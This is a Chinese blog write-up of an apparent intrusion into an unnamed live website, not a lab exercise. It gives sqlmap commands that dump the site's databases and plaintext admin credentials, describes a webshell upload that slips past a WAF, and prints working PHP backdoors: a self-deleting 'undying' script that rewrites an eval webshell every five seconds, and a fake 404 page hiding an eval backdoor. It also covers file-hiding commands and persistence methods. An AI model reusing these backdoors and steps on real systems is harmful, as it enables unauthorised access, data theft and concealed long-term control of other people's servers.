【writeup】某站一次简单的渗透GetShell

前言


切记勿要违法犯罪

信息搜集

可以利用网络上强大的搜索引擎,或者Google hacking进行关键字搜索特定目标站点,这个以后单独开一篇。

找到目标站点

获取IP地址,nmap扫描端口

获取目标站点横幅

加载字典获取目标站点目录

获取到phpinfo信息

获取到web后台

获取到upload路径

发现注入点,进行手工测试

SQLmap测试

存在注入点,但是不要慌,看看能不能绕过

绕过成功!

外网入口利用

外网入口利用的办法有很多,这里我只阐述数据库注入,目标站点还有XSS漏洞getwebshell,不再阐述。

在本次渗透中,利用数据库注入点漏洞进行获取数据库有效信息,进而getwebshell

查询当前数据库

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --current-db

查询当前数据库用户

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --current-user

查询是否当前数据库是管理员用户

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --is-dba

查询数据库用户角色

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --roles


权限太低

查询所有数据库

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --dbs

爆表

# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX --tables

爆字段

# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX -T --columns

爆数据

# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX -T -C  XXX  --dump


运气不错,密码没有md5加密,现在已经可以登录网站后台。

登录后台

发现fckeditor编辑器文件上传漏洞

查询编辑器版本

尝试文件上传

被拦截,谷歌了一下,imunify360 云waf,国外一个比较大型的安全厂商,我利用bp抓包,截断,文件包含,中间件解析,PHP CGI解析均被拦截,那么这个编辑器漏洞可能无法利用了。

发现意外上传点

在后台product栏目有个文件上传漏洞,这是原站上传pdf文件资料下载点,尝试base64加密传一句话利用蚁剑流量混淆加密传输成功绕过。

连接蚁剑


连接成功!

终端测试


权限太低了,除root账户外,几乎都没有任何账户能够登陆ssh和执行shell命令。

意外之喜


发现大佬已经光顾过这个站点,还留下了后门和大马,尝试bp爆破。

权限提升与维持

提权

利用Linux内核进行提权,但是以往的内核提权服务器容易崩溃,所以没有尝试。

权限维持

在getshell后,往往因为内网渗透的需要不得不长时间对目标进行持续威胁(简称APT),因此需要进行权限维持,隐藏后门。

隐藏文件

attrib +s +h xxx.php  //隐藏xxx.php文件

attrib命令 用于修改文件属性
+s 设置系统文件属性
+h 设置隐藏属性

在文件夹下无法看到xxx.php,但仍然可以访问

不死马

<?php
set_time_limit(0);//程序执行时间
ignore_user_abort(1);//关掉终端后脚本仍然运行
unlink(__FILE__);//文件完整名
while(1){
file_put_contents('xxx.php','<?php $a=array($_REQUEST["xxx"]=>"3");
$b=array_keys($a)[0];
eval($b);?>');
sleep(5);
}
?>

该脚本每5秒向服务器创建xxx.php,并写入一句话免杀木马,结合attrib命令隐藏文件更好地建立后门。

404页面隐藏后门

<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
function func(){
    return @$_REQUEST["xxx"];
}
preg_replace("/xxx/e",func(),"i am xxx");
header('HTTP/1.1 404 Not Found');
?>

因为目标站点为Linux服务器,所以只列出了几个,windows的权限维持还可以利用.user.ini文件构成的PHP后门、建立影子账户、metasploit权限维持、shift后门、远程桌面会话劫持等方法,以后遇到了再说

Typecho赞赏功能

「一键投喂 软糖/蛋糕/布丁/牛奶/冰阔乐!」

冷夜清风

(๑>ڡ<)☆谢谢老板们的投食~

使用微信扫描二维码完成支付


  Previous post ヨスガノソラ
Next post   Python学习笔记(一)

仅有一条评论

  1. x计划 x计划
    很细,思路清晰

添加新评论

选择表情

  TimeLine

恢复正常更新,看心情吧。
--- updated on 2020-10-07 18:52:12 星期三

  About Me

我就是随便写写,您随便看看。
有事说事,没事烧纸,闲人勿扰,谢谢。
侧重方向:渗透测试,IT运维。

  Recent Comments

  •  小白: 无法解压怎么办?
  •  Liu先生的故事小屋: 网站改名字了原站点名字 小酱博客,现站点名字:Liu先生的故事小屋
  •  1231231: 测试
  •  122: 感谢
  •  御宅男: 码农路过,留下一个爪印!!!
  •  xue: 请问怎末给权限
  •  xue: 点了 run 一直闪退啥情况
  •  xue: 怎末解决的大佬
  •  小白兔: 感谢大佬,作为初学者能碰到这样的大佬是真的幸运
  •  wxyccc: 大佬真的太感谢你了 今天在网上找了无数资料都没能装好,出了太多问题, 有幸能看到你的文章 真的...

快乐地过是一天,不快乐地过也是一天,我为什么不快快乐乐地过每一天呢?

岂能尽随人愿,但求无愧我心。

在你内心深处,还有无穷的潜力,有一天当你回首看时,你就会知道这绝对是真的。

活在当下,别在怀念过去或者憧憬未来中浪费掉你现在的生活。

挫折时,要像大树一样,被砍了,还能再长;也要像杂草一样,虽让人践踏,但还能勇敢地活下去。